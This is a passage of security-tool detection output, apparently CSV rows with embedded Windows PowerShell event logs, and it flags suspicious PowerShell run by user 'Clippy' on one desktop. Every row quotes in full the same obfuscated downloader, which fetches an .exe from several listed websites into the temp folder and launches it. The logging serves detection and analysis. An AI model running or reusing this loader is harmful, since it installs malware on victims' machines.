CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&ap
os;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Get-Item): &quot;Get-Item&quot;
ParameterBinding(Get-Item): name=&quot;Path&quot;; value=&quot;C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418569.11515,2020-08-26T09:09:29.115150+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (New-Object,Net.WebClient,Net.WebClient,New-Object,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,Net.WebClient,new-object,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) 
neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos
;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Object): &quot;New-Object&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:29.115150Z"">
</TimeCreated>
<EventRecordID>787</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
<Data>$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&a
pos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;), DetailSequence=1
DetailTotal=1
SequenceNumber=23
UserId=DESKTOP-RIPCLIP\Clippy
HostName=ConsoleHost
HostVersion=5.1.19041.1
HostId=7d5cb8a8-0a62-4f52-ba67-09f94d24e1b7
HostApplication=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
EngineVersion=5.1.19041.1
RunspaceId=b385ee3b-6b79-46f4-a038-8be3065370c3
PipelineId=6
ScriptName=
CommandLine=$Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&ap
os;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(New-Object): &quot;New-Object&quot;
ParameterBinding(New-Object): name=&quot;TypeName&quot;; value=&quot;neT.WEbcLiENt&quot;
</Data>
<Binary></Binary>
</EventData>
</Event>",DESKTOP-RIPCLIP,Windows PowerShell
Powershell Executing Pipeline - Suspicious Powershell Commands detected,1598418573.505877,2020-08-26T09:09:33.505877+04:00,,Threat,Critical,"Found User (DESKTOP-RIPCLIP\Clippy) run Suspicious PowerShell commands that include (Net.WebClient,Net.WebClient,Net.WebClient,Net.WebClient,$env:TEMP\,char,-f , -Force,foreach,$Env:Temp\,invoke,Net.WebClient,\Windows\System32) in event with Command Line ($Va5w3n8=((&apos;Q&apos;+&apos;2h&apos;)+(&apos;w9p&apos;+&apos;1&apos;));&amp;(&apos;ne&apos;+&apos;w-&apos;+&apos;item&apos;) $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::&quot;SecURi`T`ypRO`T`oCOL&quot; = (&apos;t&apos;+&apos;ls&apos;+&apos;1&apos;+(&apos;2, tl&apos;+&apos;s&apos;)+&apos;11&apos;+(&apos;, &apos;+&apos;tls&apos;));$Depssu0 = ((&apos;D&apos;+&apos;yx&apos;)+(&apos;x&apos;+&apos;ur4g&apos;)+&apos;x&apos;);$A74_j9r=(&apos;T&apos;+&apos;4&apos;+(&apos;gf45&apos;+&apos;h&apos;));$Fdkhtf_=$env:temp+((&apos;{0}&apos;+&apos;word{&apos;+&apos;0}&apos;+(&apos;2&apos;+&apos;01&apos;)+&apos;9{0}&apos;) -F [CHAr]92)+$Depssu0+(&apos;.&apos;+(&apos;ex&apos;+&apos;e&apos;));$O39nj1p=(&apos;J6&apos;+&apos;9l&apos;+(&apos;hm&apos;+&apos;h&apos;));$Z8i525z=&amp;(&apos;new-&apos;+&apos;obje&apos;+&apos;c&apos;+&apos;t&apos;) 
neT.WEbcLiENt;$Iwmfahs=((&apos;h&apos;+&apos;ttp&apos;)+(&apos;:&apos;+&apos;//&apos;)+(&apos;q&apos;+&apos;u&apos;+&apos;anticaelectro&apos;+&apos;n&apos;+&apos;ic&apos;)+(&apos;s.com&apos;+&apos;/&apos;)+&apos;w&apos;+&apos;p-&apos;+&apos;a&apos;+(&apos;d&apos;+&apos;min&apos;)+&apos;/&apos;+&apos;7A&apos;+(&apos;Tr78&apos;+&apos;/*&apos;+&apos;htt&apos;)+(&apos;p&apos;+&apos;s:/&apos;)+(&apos;/r&apos;+&apos;e&apos;)+&apos;be&apos;+(&apos;l&apos;+&apos;co&apos;)+&apos;m&apos;+&apos;.&apos;+(&apos;ch/&apos;+&apos;pi&apos;+&apos;c&apos;)+(&apos;ture&apos;+&apos;_&apos;)+(&apos;l&apos;+&apos;ibra&apos;+&apos;ry/bbCt&apos;)+(&apos;l&apos;+&apos;S/&apos;)+(&apos;*ht&apos;+&apos;tp&apos;+&apos;s:/&apos;)+(&apos;/re&apos;+&apos;al&apos;)+&apos;e&apos;+&apos;s&apos;+(&apos;tate&apos;+&apos;a&apos;)+(&apos;gen&apos;+&apos;t&apos;)+&apos;te&apos;+(&apos;am.co&apos;+&apos;m&apos;)+&apos;/&apos;+(&apos;163/Q&apos;+&apos;T&apos;)+&apos;d&apos;+(&apos;/&apos;+&apos;*ht&apos;+&apos;tps:&apos;)+&apos;//&apos;+(&apos;w&apos;+&apos;ww.&apos;)+(&apos;ri&apos;+&apos;dd&apos;)+(&apos;hi&apos;+&apos;display.&apos;+&apos;c&apos;+&apos;o&apos;)+&apos;m/&apos;+&apos;r&apos;+&apos;id&apos;+&apos;d&apos;+(&apos;hi&apos;+&apos;/1pKY/&apos;+&apos;*htt&apos;)+&apos;p&apos;+(&apos;:&apos;+&apos;//&apos;)+(&apos;radi&apos;+&apos;osu&apos;+&apos;bmit.com/&apos;+&apos;sear&apos;)+(&apos;ch_&apos;+&apos;tes&apos;+&apos;t&apos;)+&apos;/&apos;+&apos;p&apos;+(&apos;/*&apos;+&apos;h&apos;)+(&apos;ttp&apos;+&apos;:/&apos;)+&apos;/&apos;+(&apos;res&apos;+&apos;e&apos;)+&apos;ar&apos;+(&apos;ch&apos;+&apos;c&apos;)+&apos;he&apos;+&apos;m&apos;+(&apos;plu&apos;+&apos;s.&apos;+&apos;c&apos;)+(&apos;om/w&apos;+&apos;p-&apos;)+(&apos;a&apos;+&apos;dmin&apos;)+&apos;/1&apos;+(&apos;OC&apos;+&apos;C&apos;)+&apos;/&apos;+(&apos;*http:&apos;+&apos;/&apos;)+(&apos;/s&apos;+&apos;zymo&apos;)+(&apos;ns&apos;+&apos;zyp&apos;)+&apos;er&apos;+(&apos;sk&apos;+&apos;i&apos;)+(&apos;.&apos;+&apos;pl/a&apos;)+&apos;ss&apos
;+(&apos;ets/&apos;+&apos;p&apos;)+&apos;k/&apos;).&quot;S`Plit&quot;([char]42);$Zxnbryr=((&apos;Dp&apos;+&apos;z9&apos;)+&apos;4&apos;+&apos;a6&apos;);foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.&quot;d`OWN`load`FIlE&quot;($Mqku5a2, $Fdkhtf_);$Lt8bjj7=(&apos;Ln&apos;+(&apos;wp&apos;+&apos;ag&apos;)+&apos;m&apos;);If ((.(&apos;Get-I&apos;+&apos;t&apos;+&apos;em&apos;) $Fdkhtf_).&quot;le`NgTH&quot; -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .(&apos;Invo&apos;+&apos;ke&apos;+&apos;-Item&apos;)($Fdkhtf_);$Nfgrgu9=((&apos;Qj6&apos;+&apos;bs&apos;)+&apos;x&apos;+&apos;n&apos;);break;$D7ypgo1=(&apos;Bv&apos;+(&apos;e&apos;+&apos;bc&apos;)+&apos;k0&apos;)}}catch{}}$Gmk6zmk=((&apos;Z2x&apos;+&apos;aaj&apos;)+&apos;0&apos;),CommandInvocation(Invoke-Item): &quot;Invoke-Item&quot;) and full command (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) ",800,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""PowerShell"">
</Provider>
<EventID Qualifiers=""0"">800</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>8</Task>
<Opcode>0</Opcode>
<Keywords>0x80000000000000</Keywords>
<TimeCreated SystemTime=""2020-08-26T05:09:33.505877Z"">
</TimeCreated>
<EventRecordID>792</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""0"" ThreadID=""0"">
</Execution>
<Channel>Windows PowerShell</Channel>
<Computer>DESKTOP-RIPCLIP</Computer>
<Security>
</Security>
</System>
<EventData>
